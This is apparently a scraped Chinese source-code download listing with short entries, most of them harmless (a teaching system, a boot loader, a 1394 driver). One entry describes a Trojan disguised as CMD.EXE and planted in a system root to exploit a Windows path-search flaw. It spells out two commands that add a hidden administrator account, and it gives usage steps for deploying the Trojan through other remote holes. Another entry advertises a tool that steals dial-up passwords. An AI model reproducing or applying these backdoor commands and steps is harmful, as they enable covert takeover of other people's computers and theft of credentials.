-
boozt C。
boozt.c
- 2022-04-15 05:16:54下载
- 积分:1
-
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
- 2022-06-01 08:01:12下载
- 积分:1
-
Layer 7 Filter
Layer 7 Filter
- 2022-08-14 22:35:49下载
- 积分:1
-
使用Win32 File I/O API进行远程共享主机的文件操作的代码,附VB的演示程序!...
使用Win32 File I/O API进行远程共享主机的文件操作的代码,附VB的演示程序!-use Win32 File I/O API for remote file sharing mainframe operation of the code, with VB demo program!
- 2022-07-16 02:45:42下载
- 积分:1
-
JAVA教学管理系统
JAVA教学管理系统- teaching management system of java
- 2022-08-30 16:45:35下载
- 积分:1
-
引导加载实践
引导加载练习
- 2022-05-18 19:36:12下载
- 积分:1
-
网络安全,网络控制,服务器设置,客户端分析,打印等…
网络安全,网络控制,服务器设置,客户端分析,打印服务分析系统与设计,有网络爱好者请看!-Network security, network control, server settings, client analysis, printing services and design analysis systems, have network enthusiasts see!
- 2022-02-02 14:51:38下载
- 积分:1
-
a Web site's source code
一个网站的源代码-a Web site"s source code
- 2023-01-21 23:40:04下载
- 积分:1
-
运行以后把电脑里拨号密码都偷出来
运行以后把电脑里拨号密码都偷出来-Run after the computer dial-up password are stolen by
- 2022-07-08 05:39:36下载
- 积分:1
-
把1394作为一种用于在代码中使用的卡片设备
把1394设备做为网卡使用的一段代码,在linux下使用-put 1394 as a card equipment used in a code used in Linux
- 2023-06-02 14:05:03下载
- 积分:1